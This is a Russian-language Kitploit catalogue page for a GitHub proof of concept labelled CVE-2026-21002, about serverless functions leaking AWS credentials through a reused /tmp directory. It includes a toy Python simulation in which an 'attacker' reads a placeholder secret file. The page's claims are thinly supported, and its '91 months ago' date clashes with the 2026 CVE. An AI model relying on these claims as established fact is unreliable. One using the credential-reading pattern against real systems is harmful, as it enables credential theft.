Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp — PoC-эксплойт для CVE-2026-21002 — утечки учётных данных при холодном старте serverless-функций, демонстрирующий, как повторно используемые каталоги /tmp в Lambda раскрывают секреты AWS другим функциям. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
Безопасность облачной инфраструктурыАнализ уязвимостейЭксплуатацияБессерверная безопасностьЭксфильтрация данныхБезопасность облачных средОбучение и Образование
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

PoC-эксплойт для CVE-2026-21002 — утечки учётных данных при холодном старте serverless-функций, демонстрирующий, как повторно используемые каталоги /tmp в Lambda раскрывают секреты AWS другим функциям.

Репозиторий
91 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-21002 – Утечка учётных данных при холодном старте бессерверных функций через повторное использование /tmp

Программный код (симуляция Python AWS Lambda)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – Утечка учётных данных при холодном старте бессерверных функций

Severity: Critical

Обзор

Бессерверные платформы повторно используют среду выполнения (включая /tmp) между вызовами функций и даже между разными функциями одной учётной записи. Функция атакующего может прочитать чувствительные файлы, оставленные в /tmp другой функцией после холодного старта, что приводит к краже учётных данных.

Детали уязвимости

  • Тип: Раскрытие информации / утечка между функциями
  • Воздействие: Компрометация учётных данных, горизонтальное перемещение.
  • Корневая причина: Каталог /tmp является общим для тёплых контейнеров без изоляции между функциями.

Демонстрация эксплуатации

Запустите симуляцию:

root@kitploit:~
python lambda_func_sim.py

Атакующий читает AWS_SECRET_ACCESS_KEY, оставленный функцией жертвы.

Скачать инструмент